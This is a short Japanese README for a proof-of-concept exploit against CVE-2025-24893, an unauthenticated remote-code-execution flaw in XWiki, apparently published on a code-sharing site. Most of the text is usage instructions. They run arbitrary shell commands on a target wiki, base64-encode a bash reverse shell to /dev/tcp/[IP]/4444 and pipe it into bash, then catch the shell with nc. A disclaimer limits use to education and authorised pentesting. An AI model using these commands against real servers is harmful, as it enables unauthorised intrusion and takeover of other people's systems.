
CVE-2025-24893 の更新された概念実証(PoC)エクスプロイトです。XWiki における認証不要の重大な RCE 脆弱性です。このバージョンはオリジナルを改良し、任意のシェルコマンド実行とクリーンなリバースシェル注入を可能にします。
作成者: HexHunter404
このコードは教育目的および許可を得たペネトレーションテスト目的のみで提供されています。 自身が所有していない、または明示的なテスト許可を得ていないシステムに対して使用しないでください。
bash -c '<command>' によるコマンド実行をサポート/xwiki パスを維持し、リダイレクトループを回避python3 CVE-2025-24893-PoC.py -u http://<target>/xwiki -c "<command>"
echo "bash -i >& /dev/tcp/[IP]/4444 0>&1" | base64
python3 CVE-2025-24893-PoC.py -u [URL] -c "echo [Base64 Payload] | base64 -d | bash"
nc -lvnp 4444
成功すると、シェルを取得できます。